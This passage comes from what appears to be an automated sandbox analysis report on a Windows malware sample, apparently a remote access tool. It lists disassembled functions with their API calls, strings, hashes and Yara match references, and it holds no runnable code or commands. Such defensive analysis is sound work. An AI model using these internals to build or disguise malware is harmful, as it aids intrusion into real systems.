                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                                                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                                                                                                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                                                                                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,274C4AEA,?,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000), ref: 274C4B59
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 274C4B6C
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,274C4AEA,?,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000,00000001,274C2082), ref: 274C4B8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: 909ecdd7557438175394d0c0cdbcd0286df6ccc2b9432207e9030099a661d486
                                                                                                                                                                    • Instruction ID: 6dbc0e1557c8c53425bdc391f82bf77ef4de551b2e437b016b7454dacbe75297
                                                                                                                                                                    • Opcode Fuzzy Hash: 909ecdd7557438175394d0c0cdbcd0286df6ccc2b9432207e9030099a661d486
                                                                                                                                                                    • Instruction Fuzzy Hash: 11F03135900108FBDB119F96C909BEDBFB9EF44665F40416CE905A6250EF399981CA51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                                    • Opcode ID: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                                                                                                                                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                                                                                                                    • Opcode Fuzzy Hash: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                                                                                                                                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                                                                                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                                                                                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                    • String ID: Alarm triggered
                                                                                                                                                                    • API String ID: 614609389-2816303416
                                                                                                                                                                    • Opcode ID: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                                                                                                                                                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                                                                                                                    • Opcode Fuzzy Hash: 8320d0a8477b2dfdf5ffede3a6159dd71cddf314a322f93aa69cf56e5021b822
                                                                                                                                                                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                                                                                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                                                                                                                                    Strings
                                                                                                                                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                    • API String ID: 3024135584-2418719853
                                                                                                                                                                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                                                                                                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                                                                                                                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                                                                                                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                                                                                                                    • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • _free.LIBCMT ref: 00444E06
                                                                                                                                                                    • _free.LIBCMT ref: 00444E1D
                                                                                                                                                                    • _free.LIBCMT ref: 00444E3C
                                                                                                                                                                    • _free.LIBCMT ref: 00444E57
                                                                                                                                                                    • _free.LIBCMT ref: 00444E6E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3033488037-0
                                                                                                                                                                    • Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                                                                                                                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                                                                                                                    • Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                                                                                                                                                                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                                                                                                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                                                                                                                                      • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                                                                                                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2180151492-0
                                                                                                                                                                    • Opcode ID: 1cedd583b9f178e593e3ec917ceb522a4c434ac57ce81cfb097246834ccbafe2
                                                                                                                                                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1cedd583b9f178e593e3ec917ceb522a4c434ac57ce81cfb097246834ccbafe2
                                                                                                                                                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                                                                                                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                                                                                                                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                                                                                                                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                                                                                                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                                                                                                                    • __freea.LIBCMT ref: 0045121D
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 313313983-0
                                                                                                                                                                    • Opcode ID: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                                                                                                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                                                                                                                    • Opcode Fuzzy Hash: 176232f54f3ec98bfb029651777c0c6490447229ae5715771154ed3ce12be0f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                                                                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                                                                                                                    • _free.LIBCMT ref: 0044F3BF
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                    • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                                                                                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 274C715C
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 274C717F
                                                                                                                                                                      • Part of subcall function 274C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 274C5702
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 274C71A5
                                                                                                                                                                    • _free.LIBCMT ref: 274C71B8
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 274C71C7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                    • Opcode ID: e06a2bbc45e0ba1e633e5937a308df93f1b437bf01c7cfd15176df4786a4909c
                                                                                                                                                                    • Instruction ID: 42e075016fdbb3ae87e6179e22d15777e4882a289eacc4e2440e4e2bea16e44b
                                                                                                                                                                    • Opcode Fuzzy Hash: e06a2bbc45e0ba1e633e5937a308df93f1b437bf01c7cfd15176df4786a4909c
                                                                                                                                                                    • Instruction Fuzzy Hash: E901847A602226FF23139ABB4C89DBB6E6DDFC2DA5714016DBD04C7300EE648C0285B1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                                                                                                                    • _free.LIBCMT ref: 004482D3
                                                                                                                                                                    • _free.LIBCMT ref: 004482FA
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                    • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                                                                                                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                                                                                                                                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,274C636D,274C5713,00000000,?,274C2249,?,?,274C1D66,00000000,?,?,00000000), ref: 274C5B7F
                                                                                                                                                                    • _free.LIBCMT ref: 274C5BB4
                                                                                                                                                                    • _free.LIBCMT ref: 274C5BDB
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C5BE8
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C5BF1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                    • Opcode ID: cefdbbc3e4fd2fbabef0c5b1286287b33e2ead2d73fc9893944415ac4722124d
                                                                                                                                                                    • Instruction ID: 0db4a7df8e95a03e5eb5c9f680dd37f3bfd23d773c927613ae50c0eaaa73431e
                                                                                                                                                                    • Opcode Fuzzy Hash: cefdbbc3e4fd2fbabef0c5b1286287b33e2ead2d73fc9893944415ac4722124d
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C01283E105621E79303E6391C85EEFEE699BD2974B31012CF81596242FE6CCA424161
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

